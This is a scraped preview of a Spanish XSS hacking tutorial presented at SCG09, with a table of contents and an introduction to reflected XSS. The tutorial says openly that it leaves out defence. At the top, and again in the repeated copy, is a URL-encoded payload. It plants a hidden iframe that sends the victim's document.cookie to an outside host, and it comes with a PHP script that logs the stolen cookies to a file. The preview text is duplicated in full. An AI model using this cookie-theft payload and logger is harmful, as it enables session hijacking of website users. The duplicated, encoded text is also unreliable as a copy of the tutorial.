Proyectos
Páginas: 9 (2247 palabras)
Publicado: 12 de mayo de 2013
$3Ssion:!
[url=javascript:document.write(unescape('%3C%69%66%72%61%6D%65%
20%77%69%64%74%68%3D%22%30%25%22%20%68%65%69%67%68%74%3D%22%30%25%22%20%73
%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%72%6F%6F%74%73%68%65
%6C%6C%2E%62%65%2E%2F%63%6F%6F%6B%69%65%73
%2E%70%68%70
%3F%63%6F%6F%6B%69%65%3D%27%20%2B%20%64%6F%63
%75%6D%65%6E%74%2E%63%6F
%6F%6B%69%65%20%2B%20%27%20%66%72%61%6D%65%62%6F%72%64%65%72
%3D%22%30%25%22%3E'))
%3C%3F%70%68%70%20%24%63%6F%6F%6B%69%65
%20%3D%20%24%5F%47%45%54%5B%27%63%
6F%6F%6B%69%65%27%5D%3B%20
%24%68%61
%6E%64%6C%65%72%20%3D%20
%66%6F%70%65%6E
%28%27%63%6F%6F%6B%69
%65%73%2E
%74%78%74%27%2C%20%27%61
%27%29%3B
%20%66%77%72%69
%74%65%28%24%68%61
%6E%64%6C%65%72%2C%20%24
%63%6F%6F%6B%69
%65%2E%22
%5C%6E%22%29
%3B%20
%3F%3EPresentado en:
SCG09
lord epsylon
.:XSS_Hacking_tutorial_SP
.:hacktivism blackbook_1.0:.
“for fun and profit”
.:Índice:.
1.- Introducción
2.- Tipos de Ataques
5.- Técnicas de ataque
+ Classic XSS - Robando “cookies”
+ XSS Proxy
+ XSS Shell
+ Ajax Exploitation
+ XSS Virus / Worms
+ Router jacking
+ WAN Browser hijacking
- DNS cache poison
- XSS Injected code on server
-Practical Browser Hijacking
- Reflected Cross Site Scripting (XSS Reflejado)
- Stored Cross Site Scripting (XSS Persistente)
- DOM Cross Site Scripting (DOM XSS)
- Cross Site Flashing (XSF)
- Cross Site Request/Reference Forgery (CSRF)
- Cross Frame Scripting (XFS)
- Cross Zone Scripting (XZS)
- Cross Agent Scripting (XAS)
- Cross Referer Scripting (XRS)
- Denial of Service (XSSDoS)
-Flash! Attack
6.- XSS Cheats - Fuzz Vectors
- Induced XSS
- Image Scripting
7.- Screenshots
- anti-DNS Pinning
- IMAP3 XSS
8.- Herramientas
- MHTML XSS
- Expect Vulnerability
9.- Links
3.- Evitando Filtros
10.- Bibliografía
4.- PoC examples - Bypassing filters
11.- Licencia de uso
- Data Control PoC
- Frame Jacking PoC
12.- Autor
.:Introducción :.
(Tipos de Ataques) .:Introducción:.
En la presentación se exponen tipos de ataques conocidos, formas de evasión de filtros,
diferentes técnicas/finalidades de un atacante y una recopilación de herramientas, links,
ideas y vectores válidos.
El Cross Site Scripting (XSS) es la vulnerabilidad más explotada según la OWASP (Open
Web Application Security Project)
En el XSS se manipula la entrada (input) deparámetros de una aplicación con el objetivo
de obtener una salida (output) determinada que no sea la habitual al funcionamiento del
sistema.
Algunas estadísticas afirman que el 90% de todos los sitios web tienen al menos una
vulnerabilidad, y el 70% de todas las vulnerabilidades son XSS.
A pesar de tratarse de una temática en seguridad algo antigua, aún siguen apareciendo
nuevos vectores de ataquey técnicas que hacen que se encuentra en constante
evolución.
Se trata de un tipo de ataque muy imaginativo.
Existen formas de proteger contra la inyección de código malicioso. La “presentación” no
trata ese punto de vista ;)
.:Reflected Cross Site Scripting :.
(OWASP-DV-001)
.:Reflected Cross Site Scripting :.
(OWASP-DV-001)
El ataque Cross-site Scripting (XSS) no persistente; esun tipo de inyección de código
en la que éste no se ejecuta con la aplicación web, pero si se origina cuando la víctima
carga una URL determinada (en el contexto del navegador).
El escenario más común es el siguiente:
- Atacante crea una URL con el código malicioso inyectado y la camufla
- Atacante envía el enlace a la víctima
- La víctima visita en enlace a la web vulnerable
- El códigomalicioso es ejecutado por el navegador del usuario
Este tipo de ataques generalmente se utilizan para robar las -cookies- de la víctima, secuestrar
el navegador, tratar de acceder al historial de visitas y cambiar el contenido de la web que visita
la víctima.
.:Reflected Cross Site Scripting :.
(OWASP-DV-001)
Un ejemplo de XSS Reflected podemos verlo de forma practica en páginas web...
[url=javascript:document.write(unescape('%3C%69%66%72%61%6D%65%
20%77%69%64%74%68%3D%22%30%25%22%20%68%65%69%67%68%74%3D%22%30%25%22%20%73
%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%72%6F%6F%74%73%68%65
%6C%6C%2E%62%65%2E%2F%63%6F%6F%6B%69%65%73
%2E%70%68%70
%3F%63%6F%6F%6B%69%65%3D%27%20%2B%20%64%6F%63
%75%6D%65%6E%74%2E%63%6F
%6F%6B%69%65%20%2B%20%27%20%66%72%61%6D%65%62%6F%72%64%65%72
%3D%22%30%25%22%3E'))
%3C%3F%70%68%70%20%24%63%6F%6F%6B%69%65
%20%3D%20%24%5F%47%45%54%5B%27%63%
6F%6F%6B%69%65%27%5D%3B%20
%24%68%61
%6E%64%6C%65%72%20%3D%20
%66%6F%70%65%6E
%28%27%63%6F%6F%6B%69
%65%73%2E
%74%78%74%27%2C%20%27%61
%27%29%3B
%20%66%77%72%69
%74%65%28%24%68%61
%6E%64%6C%65%72%2C%20%24
%63%6F%6F%6B%69
%65%2E%22
%5C%6E%22%29
%3B%20
%3F%3EPresentado en:
SCG09
lord epsylon
.:XSS_Hacking_tutorial_SP
.:hacktivism blackbook_1.0:.
“for fun and profit”
.:Índice:.
1.- Introducción
2.- Tipos de Ataques
5.- Técnicas de ataque
+ Classic XSS - Robando “cookies”
+ XSS Proxy
+ XSS Shell
+ Ajax Exploitation
+ XSS Virus / Worms
+ Router jacking
+ WAN Browser hijacking
- DNS cache poison
- XSS Injected code on server
-Practical Browser Hijacking
- Reflected Cross Site Scripting (XSS Reflejado)
- Stored Cross Site Scripting (XSS Persistente)
- DOM Cross Site Scripting (DOM XSS)
- Cross Site Flashing (XSF)
- Cross Site Request/Reference Forgery (CSRF)
- Cross Frame Scripting (XFS)
- Cross Zone Scripting (XZS)
- Cross Agent Scripting (XAS)
- Cross Referer Scripting (XRS)
- Denial of Service (XSSDoS)
-Flash! Attack
6.- XSS Cheats - Fuzz Vectors
- Induced XSS
- Image Scripting
7.- Screenshots
- anti-DNS Pinning
- IMAP3 XSS
8.- Herramientas
- MHTML XSS
- Expect Vulnerability
9.- Links
3.- Evitando Filtros
10.- Bibliografía
4.- PoC examples - Bypassing filters
11.- Licencia de uso
- Data Control PoC
- Frame Jacking PoC
12.- Autor
.:Introducción :.
(Tipos de Ataques) .:Introducción:.
En la presentación se exponen tipos de ataques conocidos, formas de evasión de filtros,
diferentes técnicas/finalidades de un atacante y una recopilación de herramientas, links,
ideas y vectores válidos.
El Cross Site Scripting (XSS) es la vulnerabilidad más explotada según la OWASP (Open
Web Application Security Project)
En el XSS se manipula la entrada (input) deparámetros de una aplicación con el objetivo
de obtener una salida (output) determinada que no sea la habitual al funcionamiento del
sistema.
Algunas estadísticas afirman que el 90% de todos los sitios web tienen al menos una
vulnerabilidad, y el 70% de todas las vulnerabilidades son XSS.
A pesar de tratarse de una temática en seguridad algo antigua, aún siguen apareciendo
nuevos vectores de ataquey técnicas que hacen que se encuentra en constante
evolución.
Se trata de un tipo de ataque muy imaginativo.
Existen formas de proteger contra la inyección de código malicioso. La “presentación” no
trata ese punto de vista ;)
.:Reflected Cross Site Scripting :.
(OWASP-DV-001)
.:Reflected Cross Site Scripting :.
(OWASP-DV-001)
El ataque Cross-site Scripting (XSS) no persistente; esun tipo de inyección de código
en la que éste no se ejecuta con la aplicación web, pero si se origina cuando la víctima
carga una URL determinada (en el contexto del navegador).
El escenario más común es el siguiente:
- Atacante crea una URL con el código malicioso inyectado y la camufla
- Atacante envía el enlace a la víctima
- La víctima visita en enlace a la web vulnerable
- El códigomalicioso es ejecutado por el navegador del usuario
Este tipo de ataques generalmente se utilizan para robar las -cookies- de la víctima, secuestrar
el navegador, tratar de acceder al historial de visitas y cambiar el contenido de la web que visita
la víctima.
.:Reflected Cross Site Scripting :.
(OWASP-DV-001)
Un ejemplo de XSS Reflected podemos verlo de forma practica en páginas web...
Leer documento completo
Regístrate para leer el documento completo.